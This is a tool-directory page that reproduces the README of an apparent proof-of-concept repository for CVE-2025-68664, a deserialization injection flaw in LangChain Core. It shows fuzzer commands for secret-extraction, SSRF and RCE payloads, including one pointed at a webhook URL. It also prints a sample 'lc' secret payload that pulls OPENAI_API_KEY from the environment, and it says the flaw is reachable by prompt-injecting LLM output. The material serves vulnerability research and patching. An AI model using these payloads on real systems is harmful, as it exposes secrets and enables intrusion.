Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-68664-LangGrinch-PoC — A testing framework to identify and demonstrate deserialization vulnerabilities in LangChain Core (<0.3.81). Educational use only | Kitploit
Tools/GitHubGitHub/ak-cybe/cve-2025-68664-langgrinch-poc
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingSecret DetectionLearning & EducationPayload DevelopmentAI Security
GitHubak-cybe/cve-2025-68664-langgrinch-poc

CVE-2025-68664-LangGrinch-PoC

A testing framework to identify and demonstrate deserialization vulnerabilities in LangChain Core (<0.3.81). Educational use only

View Repository
32229 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Header Banner

Typing SVG

Severity Type Codename Status CWE


📑 Table of Contents

  • 🎯 Executive Summary
  • 📂 Project Structure
  • 🚀 Quick Start
  • 🐛 Vulnerability Deep Dive
  • 🔬 Technical Root Cause Analysis
  • ⚔️ Attack Chain Methodology
  • 💀 Payload Arsenal (55+)
  • 🎮 Operator's Strategy Guide
  • 🛡️ Mitigation & Defense
  • 📚 References & Credits

📂 Project Structure

LangGrinch-PoC/
│
├── README.md              # Main documentation & writeup
├── PAYLOADS.md            # Complete payload arsenal (55+)
├── langgrinch_fuzzer.py   # Python payload generator & tester
├── requirements.txt       # Python dependencies
└── LICENSE                # MIT License

🚀 Quick Start

Installation

# Clone the repository
git clone https://github.com/Ak-cybe/LangGrinch-PoC.git
cd LangGrinch-PoC

# Install dependencies
pip install -r requirements.txt

Usage

# List all available payloads
python langgrinch_fuzzer.py --list

# Show payloads by category
python langgrinch_fuzzer.py --category recon
python langgrinch_fuzzer.py --category ssrf
python langgrinch_fuzzer.py --category rce

# Generate custom secret extraction payload
python langgrinch_fuzzer.py --secret MY_API_KEY

# Generate custom SSRF payload
python langgrinch_fuzzer.py --ssrf http://your-webhook.com/

# Export all payloads to JSON
python langgrinch_fuzzer.py --export payloads.json

Hacker GIF Security GIF Matrix GIF


🎯 Executive Summary

CVE-2025-68664 (Codename: LangGrinch) is a critical serialization injection vulnerability discovered in the LangChain Core Python package. This vulnerability allows attackers to inject malicious lc markers through LLM outputs or user-controlled dictionaries, enabling:

  1. 🔑 Environment secrets extraction (API keys, DB passwords)
  2. 🌐 SSRF attacks (hitting internal services)
  3. 💀 Remote Code Execution (via Jinja2 SSTI chain)
  4. 📂 File system access (reading sensitive files)

⚡ Quick Stats

🔥 Metric📊 Value
CVE IDCVE-2025-68664
CodenameLangGrinch
Attack TypeDeserialization Injection
Auth RequiredNo (Prompt Injection)
ComplexityLOW

🎯 Affected Versions

📌 Property📝 Value
Packagelangchain-core
Vulnerable< 0.3.81, >= 1.0.0 < 1.2.5
Patched0.3.81+, 1.2.5+
ImpactSecrets + RCE
CWECWE-502

🐛 Vulnerability Deep Dive

Bug GIF

📋 Technical Overview

PropertyValue
🆔 CVE IDCVE-2025-68664
🏷️ CodenameLangGrinch
📊 SeverityCRITICAL 🔴
🔗 CWECWE-502 (Deserialization of Untrusted Data)
📦 Affected Packagelangchain-core
⚠️ Vulnerable Versions< 0.3.81 AND >= 1.0.0, < 1.2.5
✅ Patched Versions0.3.81+, 1.2.5+

🤖 What is LangChain?

LangChain is a popular Python framework used to build applications with Large Language Models (LLMs). It is widely deployed across various industries:

🏢 Use Case📝 Description
🤖 AI ChatbotsCustomer service, support agents
🔍 RAG SystemsRetrieval-Augmented Generation
🔧 AI AgentsAutonomous task execution
📊 Data ProcessingDocument analysis, summarization
🔄 Workflow AutomationAI-powered pipelines

🔧 Technical Root Cause

LangChain's internal serialization format uses a special marker - the lc key. When a dictionary contains the lc key, the LangChain deserializer treats it as a "trusted LangChain serialized object."

The bug is:

  • dumps() / dumpd() functions do NOT escape/neutralize the lc key in user/LLM-controlled dictionaries
  • During rehydration via load() / loads(), the injected structure is processed as an internal object
🔓 VULNERABILITY CHAIN:
┌─────────────────────────────────────────────────────────────────┐
│  📝 User/LLM Input → Dictionary with malicious "lc" marker     │
│                           ↓                                     │
│  💾 Application serializes data (dumps/dumpd)                   │
│                           ↓                                     │
│  ⚠️  "lc" key NOT escaped - remains in serialized form          │
│                           ↓                                     │
│  🔄 Later: Data deserialized (load/loads)                       │
│                           ↓                                     │
│  🎯 Deserializer sees "lc" → Treats as LangChain object!        │
│                           ↓                                     │
│  💀 Secret resolution / Object instantiation triggered          │
│                           ↓                                     │
│  💥 SECRETS LEAKED / SSRF / RCE                                 │
└─────────────────────────────────────────────────────────────────┘

🔬 Technical Root Cause Analysis

🎯 The "lc" Marker Problem

In LangChain's serialization format, the presence of "lc": 1 inside a dictionary indicates that it is a LangChain serialized object, not normal user data:

{
  "lc": 1,
  "type": "secret",
  "id": ["OPENAI_API_KEY"]
}

When the deserializer encounters this structure:

  1. lc == 1 confirms it's a LangChain object
  2. type == "secret" triggers the secret resolution path
  3. The environment variable name is extracted from the id array
  4. Result: os.environ["OPENAI_API_KEY"] value is returned!

🗺️ Attack Flow Diagram

Download Tool